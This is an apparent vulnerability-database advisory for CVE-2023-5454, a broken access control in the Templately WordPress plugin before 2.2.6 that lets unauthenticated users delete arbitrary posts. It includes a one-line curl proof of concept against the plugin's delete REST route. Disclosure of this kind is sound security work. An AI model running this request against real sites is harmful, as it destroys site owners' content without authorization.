Templately < 2.2.6 – Unauthenticated Arbitrary Post Deletion | CVE 2023-5454

Description

The plugin does not properly authorize the `saved-templates/delete` REST API call, allowing unauthenticated users to delete arbitrary posts.

Proof of Concept

Ensure the Elementor plugin is installed so that the Elementor Template functionality is enabled.

curl -X POST https://example.com/?rest_route=/templately/v1/saved-templates/delete -d 'id=1'

Affects Plugins

templately

Fixed in 2.2.6

References

CVE

CVE-2023-5454

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CWE-284

CVSS

5.3 (medium)

Miscellaneous

Original Researcher

Krzysztof Zając (CERT PL)

Submitter

Krzysztof Zając (CERT PL)

Submitter website

https://cert.pl

Submitter twitter

cert_polska_en

Verified

Yes

WPVDB ID

1854f77f-e12a-4370-9c44-73d16d493685

Timeline

Publicly Published

2023-10-16 (about 2 years ago)

Added

2023-10-16 (about 2 years ago)

Last Updated

2023-12-05 (about 2 years ago)

Other

Published

Title

Published

2021-05-05

Title

Simple Admin Language Change < 2.0.2 - Arbitrary User Locale Change

Published

2025-02-03

Title

B Slider- Gutenberg Slider Block for WP < 1.1.24 - Authenticated (Contributor+) Private Post Disclosure via bsb-slider Shortcode

Published

2020-09-28

Title

WP Courses < 2.0.29 - Broken Access Controls leading to Courses Content Disclosure

Published

2024-02-02

Title

EventPrime < 3.4.0 - Improper Input Validation via save_event_booking

Published

2021-07-07

Title

WP Upload Restriction < 2.2.5 - Missing Access Control in deleteCustomType